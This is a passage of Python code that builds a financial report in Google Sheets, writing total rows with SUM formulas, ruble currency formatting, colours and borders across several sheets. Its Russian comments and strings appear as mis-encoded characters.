f"=IFERROR(ROUND(AA{height_table}/Z{height_table};2);0)",
f"=SUM(AC3:AC{height_table - 1})",
f"=SUM(AD3:AD{height_table - 1})",
f"=IFERROR(ROUND(AD{height_table}/AC{height_table};2);0)",
f"=SUM(AF3:AF{height_table - 1})",
f"=SUM(AG3:AG{height_table - 1})",
f"=IFERROR(ROUND(AG{height_table}/AF{height_table};2);0)",
f"=SUM(AI3:AI{height_table - 1})",
f"=SUM(AJ3:AJ{height_table - 1})",
f"=IFERROR(ROUND(AJ{height_table}/AI{height_table};2);0)",
f"=SUM(AL3:AL{height_table - 1})",
f"=SUM(AM3:AM{height_table - 1})",
f"=SUM(AN3:AN{height_table - 1})",
f"=SUM(AO3:AO{height_table - 1})",
f"=IFERROR(ROUND(AO{height_table}/AN{height_table};2);0)",
f"=SUM(AQ3:AQ{height_table - 1})",
f"=SUM(AR3:AR{height_table - 1})",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 1}:D{height_table + 1}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ััะฐัะธะบ)',
"",
f"=IFERROR('ะะปะฐะฝ'!C{self.sheet2_line};0)",
f"=IFERROR(ROUND(D{height_table}/C{height_table+1};2);0)",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 2}:D{height_table + 2}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ะดะพั
ะพะด)',
"",
f"=IFERROR('ะะปะฐะฝ'!E{self.sheet2_line};0)",
f"=IFERROR(ROUND(G{height_table}/C{height_table+2};2);0)",
]],
"ROWS")
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัะฐ ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{height_table}:AR{height_table}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table + 1}:D{height_table + 1}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table+2}:D{height_table+2}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{height_table}:AR{height_table}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table+1}:D{height_table+1}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table+2}:D{height_table+2}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 2...')
sheetId = 1
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
self.nex_line = self.start_line
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[
[
datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%d.%m.%Y'),
len(self.report_rk),
float(sum([line['paid_sum'] for line in self.report_rk]))
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}, 'horizontalAlignment': 'LEFT'},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}}
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.nex_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet2_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ------------------------------------------- ะะฐะฟะพะปะฝะตะฝะธะต ะะขะะะ --------------------------------------
# ะััะธัะปะตะฝะธะต ะฟะพัะปะตะดะฝะตะน ัััะพะบะธ ะฒ ัะฐะฑะปะธัะต
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ะะขะะะ ะฝะฐ ะปะธััะต 2...')
for i, line_table in enumerate(self.spreadsheet['sheets'][1]['data'][0]['rowData']):
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
# ะัะปะธ ัััะพะบะฐ ะฟะตัะตะฟะธััะฒะฐะตััั - ะธัะพะณะพ ะฝะฐ 1 ะฟะพะท ะฒะฝะธะท, ะตัะปะธ ะฝะพะฒะฐั - ะฝะฐ 2 ะฟะพะท
height_table = i + self.reprint
break
else:
height_table = 4
except KeyError:
pass
ss.prepare_setValues(
f"A{height_table}:C{height_table}",
[[f'ะะขะะะ',
f"=SUM(B3:B{height_table - 1})",
f"=SUM(C3:C{height_table - 1})"
]],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัะฐ ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{height_table}:C{height_table}",
[
[
{'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{height_table}:C{height_table}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet2_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
if self.itog_report_month:
# SHEET 4
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 4...')
sheetId = 3
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
self.nex_line = 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f'ะัะพะณะพะฒัะน ะพััะตั', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 18}})
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f"ะะฐ {self.data_report} {datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%Y')}",
'', '', ]], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': False}})
self.nex_line += 2
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['ะะฐะทะฒะฐะฝะธะต', 'ะะพะปะธัะตััะฒะพ', 'ะกัะผะผะฐ']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 14}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
for group in self.finreport_dict_month:
if group == 'ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ':
continue
if group == 'ะะฐัะฐ':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
group,
self.finreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][1],
self.finreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True, 'fontSize': 12}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT', 'numberFormat': {}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT', 'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for folder in self.finreport_dict_month[group]:
if folder == 'ะัะพะณะพ ะฟะพ ะณััะฟะฟะต':
continue
if folder == '':
continue
self.nex_line += 1
if folder is None:
folder_name = 'ะะตะท ะณััะฟะฟะธัะพะฒะบะธ'
else:
folder_name = folder
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
folder_name,
self.finreport_dict_month[group][folder][0][1],
self.finreport_dict_month[group][folder][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for servise in self.finreport_dict_month[group][folder]:
if servise[0] == 'ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
servise[0],
servise[1],
servise[2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': False}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
while self.nex_line < self.sheet4_height:
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': False, 'fontSize': 10}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#ffffff")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# SHEET 4
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 5...')
sheetId = 4
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
self.nex_line = 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f'ะัะพะณะพะฒัะน ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 18}})
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[f"ะะฐ {self.data_report} {datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%Y')}",
'', '', ]], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': False}})
